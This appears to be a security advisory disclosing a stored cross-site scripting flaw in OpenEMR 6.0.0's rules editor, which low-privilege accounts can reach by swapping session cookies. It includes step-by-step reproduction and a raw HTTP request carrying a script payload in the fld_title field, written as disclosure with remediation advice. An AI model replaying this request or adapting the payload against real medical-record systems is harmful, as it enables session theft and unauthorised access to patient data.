Stored Cross Site-Scripting (XSS)
https://localhost/openemr-6.0.0/ /interface/super/rules/index.php?action=edit!submit_summary
“fld_title”
###Authentication Required?
Yes
Non-privilege users (accounting, front-office) can create new rule and allows them to inject arbitrary web script that led to Stored Cross Site Scripting.
This vulnerability found in “/interface/super/rules/index.php?action=edit!submit_summary” on one parameter (fid_title). The XSS payload will be fired in the Plan Rules that can only be viewed by privileged users.
nsure to HTML encode before inserting any untrusted data into HTML element content. Ensure all inputs entered by user should be sanitized and validated before processing and storage.
Inputs should be filtered by the application, for example removing special characters such as < and > as well as special words such as script.
Aden Yap Chuen Zhen ([email protected])
Rizan, Sheikh ([email protected])
Ali Radzali ([email protected])
Login to EMR using admin and we can see there is a Rules tab in (Administration > Practice > Rules).
Figure 1: Login as Administrator and Go to Rules tab
Login to EMR using non-privilege users (accountant, front-office) and we can see there is no Rules tab in (Administration > Practice).
Figure 2: Login as Accountant and Check For Rules tab
Using Burp, we intercept the Admin request to add new rules in Rules tab and swap the “OpenEMR” cookie using an Accountant cookie and we are be able to create new rule that contain our XSS payload.
Figure 3: Burp Request Captured Using Accountant Cookie to Create New Rule
The Raw Request looks like:
POST /openemr/interface/super/rules/index.php?action=edit!submit_summary HTTP/1.1
Host: 192.168.153.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://192.168.153.129
Connection: close
Referer: http://192.168.153.129/openemr/interface/super/rules/index.php?action=edit!summary
Upgrade-Insecure-Requests: 1
Cookie: OpenEMR=zfLGOSTbtLDyoLLIFMlBPUrBWNNlzrYN5y60Z-BItjBhTNw0;
id=&fld_title=<script>alert(document.cookie)</script>&fld_developer=&fld_funding_source=&fld_release=&fld_web_reference=
Go to Rules page (Administration > Practice > Rules) and Click “Go” on Plans Configuration.
Figure 4: Plans & Rules Configuration Page
The XSS will be fired in any Plans configurations. For example, an Admin can select any plans and the cookies of the admin will be pop out in alert box.